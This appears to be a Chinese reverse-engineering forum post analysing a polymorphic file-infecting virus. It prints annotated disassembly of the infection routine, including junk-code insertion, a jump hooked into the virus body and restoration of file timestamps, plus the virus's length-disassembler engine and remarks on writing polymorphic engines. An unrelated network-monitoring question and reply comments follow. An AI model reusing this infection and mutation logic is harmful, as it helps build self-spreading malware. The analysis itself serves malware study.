7FF82D78 AA stos byte ptr es:
7FF82D79 EB 01 jmp short 7FF82D7C
7FF82D7B AB stos dword ptr es:
7FF82D7C FE85 10551B00 inc byte ptr ss:
7FF82D82 80B5 11551B00 0>xor byte ptr ss:,0x1
7FF82D89 EB 2A jmp short 7FF82DB5
7FF82D8B EB 05 jmp short 7FF82D92
7FF82D8D E8 820E0000 call 7FF83C14 ; 反汇编长度引擎
7FF82D92 C685 E13D1B00 B>mov byte ptr ss:,0xB3
7FF82D99 51 push ecx
7FF82D9A 294C24 08 sub dword ptr ss:,ecx
7FF82D9E F3:A4 rep movs byte ptr es:,byte ptr ds:[>; 传输代码
7FF82DA0 59 pop ecx
7FF82DA1 EB 19 jmp short 7FF82DBC
7FF82DA3 57 push edi
7FF82DA4 F71C24 neg dword ptr ss:
7FF82DA7 E8 4AF4FFFF call 7FF821F6 ; 一个ETG引擎随机产生垃圾指令
7FF82DAC 59 pop ecx ; 并且放到感染文件中
7FF82DAD 03CF add ecx,edi
7FF82DAF 298D D2541B00 sub dword ptr ss:,ecx
7FF82DB5 C685 E13D1B00 A>mov byte ptr ss:,0xAB
7FF82DBC 8B0424 mov eax,dword ptr ss:
7FF82DBF 66:018CC5 2A171>add word ptr ss:,cx
7FF82DC7 8D57 FF lea edx,dword ptr ds:
7FF82DCA E3 1E jecxz short 7FF82DEA
7FF82DCC 2B95 CE541B00 sub edx,dword ptr ss:
7FF82DD2 3B95 201B1B00 cmp edx,dword ptr ss:
7FF82DD8 76 06 jbe short 7FF82DE0
7FF82DDA 81EA 343D0000 sub edx,0x3D34
7FF82DE0 0FB395 441A1B00 btr dword ptr ss:,edx
7FF82DE7 4A dec edx
7FF82DE8^ E2 F6 loopd short 7FF82DE0
根据随机数0,1判断是否添加垃圾指令。然后挪动代码
后面有一堆代码应该是用来修正重定位和处理代码的。水平有限,看的有点吃力。
感觉要花我大量的时间。。所以这里没有分析
7FF832FD 03BD E6541B00 add edi,dword ptr ss:
7FF83303 B0 E9 mov al,0xE9
7FF83305 AA stos byte ptr es: ; 到刚才找到ff15处
7FF83306 8D42 FB lea eax,dword ptr ds:
7FF83309 2B85 FE541B00 sub eax,dword ptr ss:
7FF8330F AB stos dword ptr es: ; 跳到病毒代码的开始
7FF83310 83BD 1A551B00 0>cmp dword ptr ss:,0x0
7FF83361 /0F84 9D000000 je 7FF83404
7FF83367 |FFB5 86541B00 push dword ptr ss:
7FF8336D |FF95 C4501B00 call dword ptr ss: ; UnmapViewOfFile
7FF83373 |FFB5 82541B00 push dword ptr ss:
7FF83379 |FF95 04501B00 call dword ptr ss: ; CloseHandle
7FF8337F |80BD 07551B00 0>cmp byte ptr ss:,0x0
7FF83386 |74 1C je short 7FF833A4
7FF83388 |8D8D 6E541B00 lea ecx,dword ptr ss:
7FF8338E |8D95 76541B00 lea edx,dword ptr ss:
7FF83394 |51 push ecx
7FF83395 |52 push edx
7FF83396 |6A 00 push 0x0
7FF83398 |FFB5 6A541B00 push dword ptr ss:
7FF8339E |FF95 B8501B00 call dword ptr ss: ; SetFileTime
7FF833A4 |80BD FC551B00 0>cmp byte ptr ss:,0x0
7FF833AB |74 2F je short 7FF833DC
7FF833AD |8B85 7E541B00 mov eax,dword ptr ss:
7FF833B3 |6A 00 push 0x0
7FF833B5 |0385 8A541B00 add eax,dword ptr ss:
7FF833BB |0385 8E541B00 add eax,dword ptr ss:
7FF833C1 |6A 00 push 0x0
7FF833C3 |50 push eax
7FF833C4 |FFB5 6A541B00 push dword ptr ss:
7FF833CA |FF95 B4501B00 call dword ptr ss:
7FF833D0 |FFB5 6A541B00 push dword ptr ss:
7FF833D6 |FF95 AC501B00 call dword ptr ss: ; SetEndOfFIle
7FF833DC |FFB5 6A541B00 push dword ptr ss:
7FF833E2 |FF95 04501B00 call dword ptr ss: ; CloseHandle
7FF833E8 |80BD 06551B00 0>cmp byte ptr ss:,0x0
7FF833EF |74 13 je short 7FF83404
7FF833F1 |8DB5 62531B00 lea esi,dword ptr ss:
7FF833F7 |FFB5 66541B00 push dword ptr ss:
7FF833FD |56 push esi
7FF833FE |FF95 B0501B00 call dword ptr ss: ; SetFileAttributestA
7FF83404 \66:83A5 06551B0>and word ptr ss:,0x0
7FF8340C 83A5 6A541B00 0>and dword ptr ss:,0x0
7FF83413 C3 retn
这里是最后收尾感染结束
7C92D095 BA 0003FE7F mov edx,0x7FFE0300
7C92D09A FF12 call dword ptr ds:
返回到被hook代码之下
感染过程结束。
感染之后的样子
感染之前
4AD74A29 C605 5550D04A F>mov byte ptr ds:,0xFF
4AD74A30 C705 5650D04A 1>mov dword ptr ds:,0xD0101C15
4AD74A3A 90 nop
exe最后修复被偷的代码返回
结束。
这里附上病毒的反汇编长度引擎的简要分析。
7FF83C14 56 push esi
7FF83C15 33C9 xor ecx,ecx
7FF83C17 C685 08551B00 0>mov byte ptr ss:,0x1 ;设置为32位模式
7FF83C1E C685 09551B00 0>mov byte ptr ss:,0x1 ;设置为32位模式
7FF83C25 33C0 xor eax,eax
7FF83C27 AC lods byte ptr ds:
7FF83C28 8B8485 14441B00 mov eax,dword ptr ss: ;查表,可以知道指令信息为dword类型
7FF83C2F A9 10000000 test eax,0x10 ;两字节opcode形式
7FF83C34 74 0B je short 7FF83C41
7FF83C36 41 inc ecx ;修正opcode
7FF83C37 33C0 xor eax,eax
7FF83C39 AC lods byte ptr ds: ;再次获取
7FF83C3A 8B8485 14481B00 mov eax,dword ptr ss: ;再次查第二张表
7FF83C41 A9 00001000 test eax,0x100000
7FF83C46 74 06 je short 7FF83C4E
7FF83C48 41 inc ecx
7FF83C49 0D 00010000 or eax,0x100
7FF83C4E A9 04000000 test eax,0x4
7FF83C53 74 07 je short 7FF83C5C
7FF83C55 80B5 08551B00 0>xor byte ptr ss:,0x1 ;16/32操作数方式标志转换prefix 66h
7FF83C5C A9 08000000 test eax,0x8
7FF83C61 74 07 je short 7FF83C6A
7FF83C63 80B5 09551B00 0>xor byte ptr ss:,0x1 ; 16/32寻址方式标志转换prefix 67h
7FF83C6A A9 02000000 test eax,0x2 ;普通前缀
7FF83C6F 74 03 je short 7FF83C74
7FF83C71 41 inc ecx ;修正长度后
7FF83C72^ EB B1 jmp short 7FF83C25 ;继续获取opcode
7FF83C74 A9 21000000 test eax,0x21
7FF83C79 74 01 je short 7FF83C7C
7FF83C7B 41 inc ecx
7FF83C7C A9 20000000 test eax,0x20
7FF83C81 74 01 je short 7FF83C84
7FF83C83 41 inc ecx
7FF83C84 A9 00600000 test eax,0x6000
7FF83C89 74 11 je short 7FF83C9C
7FF83C8B 80BD 08551B00 0>cmp byte ptr ss:,0x0
7FF83C92 75 05 jnz short 7FF83C99
7FF83C94 83C1 04 add ecx,0x4
7FF83C97 EB 03 jmp short 7FF83C9C
7FF83C99 83C1 06 add ecx,0x6
7FF83C9C A9 80000000 test eax,0x80
7FF83CA1 74 0F je short 7FF83CB2
7FF83CA3 80BD 09551B00 0>cmp byte ptr ss:,0x1
7FF83CAA 75 03 jnz short 7FF83CAF
7FF83CAC 83C1 02 add ecx,0x2
7FF83CAF 83C1 02 add ecx,0x2
7FF83CB2 A9 40000000 test eax,0x40 ;跳转模式
7FF83CB7 74 0F je short 7FF83CC8
7FF83CB9 80BD 08551B00 0>cmp byte ptr ss:,0x1 ;确认模式
7FF83CC0 75 03 jnz short 7FF83CC5
7FF83CC2 83C1 02 add ecx,0x2
7FF83CC5 83C1 02 add ecx,0x2 ;修正长度
7FF83CC8 A9 00000800 test eax,0x80000
7FF83CCD 74 19 je short 7FF83CE8
7FF83CCF 50 push eax
7FF83CD0 AC lods byte ptr ds:
7FF83CD1 3C F8 cmp al,0xF8
7FF83CD3 74 08 je short 7FF83CDD
7FF83CD5 3C E8 cmp al,0xE8
7FF83CD7 74 04 je short 7FF83CDD
7FF83CD9 3C 70 cmp al,0x70
7FF83CDB 75 03 jnz short 7FF83CE0
7FF83CDD 41 inc ecx
7FF83CDE EB 07 jmp short 7FF83CE7
7FF83CE0 810C24 00010000 or dword ptr ss:,0x100
7FF83CE7 58 pop eax
7FF83CE8 A9 00800000 test eax,0x8000
7FF83CED 74 1B je short 7FF83D0A
7FF83CEF 8A16 mov dl,byte ptr ds:
7FF83CF1 80E2 38 and dl,0x38
7FF83CF4 75 0A jnz short 7FF83D00
7FF83CF6 B8 01010000 mov eax,0x101
7FF83CFB^ E9 2FFFFFFF jmp 7FF83C2F
7FF83D00 B8 00010000 mov eax,0x100
7FF83D05^ E9 25FFFFFF jmp 7FF83C2F
7FF83D0A A9 00000100 test eax,0x10000
7FF83D0F 74 1B je short 7FF83D2C
7FF83D11 8A16 mov dl,byte ptr ds:
7FF83D13 80E2 38 and dl,0x38
7FF83D16 75 0A jnz short 7FF83D22
7FF83D18 B8 40010000 mov eax,0x140
7FF83D1D^ E9 0DFFFFFF jmp 7FF83C2F
7FF83D22 B8 00010000 mov eax,0x100
7FF83D27^ E9 03FFFFFF jmp 7FF83C2F
7FF83D2C A9 00000200 test eax,0x20000
7FF83D31 74 0A je short 7FF83D3D
7FF83D33 B8 00010000 mov eax,0x100
7FF83D38^ E9 F2FEFFFF jmp 7FF83C2F
7FF83D3D A9 00010000 test eax,0x100 ;检测是不是有mod部分
7FF83D42 74 6E je short 7FF83DB2
7FF83D44 AC lods byte ptr ds:
7FF83D45 41 inc ecx
7FF83D46 8AD0 mov dl,al ; 保存一份
7FF83D48 24 C0 and al,0xC0 ; 解析 mod
7FF83D4A 80E2 07 and dl,0x7
7FF83D4D C0E8 06 shr al,0x6 ; 在al处获得mod
7FF83D50 3C 03 cmp al,0x3 ; 看mod方式3为不使用sib
7FF83D52 74 5E je short 7FF83DB2
7FF83D54 80BD 09551B00 0>cmp byte ptr ss:,0x0
7FF83D5B 75 1E jnz short 7FF83D7B
7FF83D5D 0AC0 or al,al
7FF83D5F 75 0A jnz short 7FF83D6B
7FF83D61 80FA 06 cmp dl,0x6
7FF83D64 75 05 jnz short 7FF83D6B
7FF83D66 83C1 02 add ecx,0x2
7FF83D69 EB 47 jmp short 7FF83DB2
7FF83D6B 3C 01 cmp al,0x1
7FF83D6D 75 03 jnz short 7FF83D72
7FF83D6F 41 inc ecx
7FF83D70 EB 40 jmp short 7FF83DB2
7FF83D72 3C 02 cmp al,0x2
7FF83D74 75 3C jnz short 7FF83DB2
7FF83D76 83C1 02 add ecx,0x2
7FF83D79 EB 37 jmp short 7FF83DB2
7FF83D7B 80FA 04 cmp dl,0x4 ; 解析的r/m部分 4为结合sib
7FF83D7E 75 16 jnz short 7FF83D96
7FF83D80 3C 03 cmp al,0x3
7FF83D82 74 12 je short 7FF83D96
7FF83D84 41 inc ecx ; 修正长度
7FF83D85 0AC0 or al,al
7FF83D87 75 0D jnz short 7FF83D96
7FF83D89 8A06 mov al,byte ptr ds: ; 获取sib
7FF83D8B 24 07 and al,0x7 ; 获得Base
7FF83D8D 3C 05 cmp al,0x5 ; 检测是不是5,5的话用立即数做base
7FF83D8F 75 03 jnz short 7FF83D94
7FF83D91 83C1 04 add ecx,0x4 ; 修正长度
7FF83D94 B0 00 mov al,0x0
7FF83D96 0AC0 or al,al ; 寄存起直接寻址
7FF83D98 75 0A jnz short 7FF83DA4
7FF83D9A 80FA 05 cmp dl,0x5
7FF83D9D 75 05 jnz short 7FF83DA4
7FF83D9F 83C1 04 add ecx,0x4
7FF83DA2 EB 0E jmp short 7FF83DB2
7FF83DA4 3C 01 cmp al,0x1 ; 寄存器加8位偏移
7FF83DA6 75 03 jnz short 7FF83DAB
7FF83DA8 41 inc ecx
7FF83DA9 EB 07 jmp short 7FF83DB2
7FF83DAB 3C 02 cmp al,0x2 ; 寄存起加32位偏移
7FF83DAD 75 03 jnz short 7FF83DB2
7FF83DAF 83C1 04 add ecx,0x4
7FF83DB2 41 inc ecx
7FF83DB3 5E pop esi
7FF83DB4 C3 retn
密码为52pojie
病毒实现多态变形,反汇编长度引擎是个保障,少不了的,写这种引擎最主要的的是建立表。
就是说,把指令归类,具有相同类型的指令编为一个码,然后就能用共同的算法进行解析。
有了长度引擎之后就能识别出指令的长度。做各种变形了。
我想要实现如下要求:
1.监控自己电脑里面所有软件访问的IP 或者网站地址,端口,
2.比如说打开了PPTV,然后就能看到它请求的地址或者端口,
3.什么软件能实现呢?
4.主要就是抓包了来屏蔽网络各种P2P软件,免得大家上网慢。
5.限速不行,需要直接屏蔽地址,谢谢! 阿拉路过,不作任何评论。 路过,围观一下, 兰斯,求带。 功力不够,看着费劲啊... 谢谢分享了 谢谢楼主无尽分享! 不错,我一点都没看懂 感谢分享,很不错 趕腳很不錯的樣紙,可是一點沒看懂。。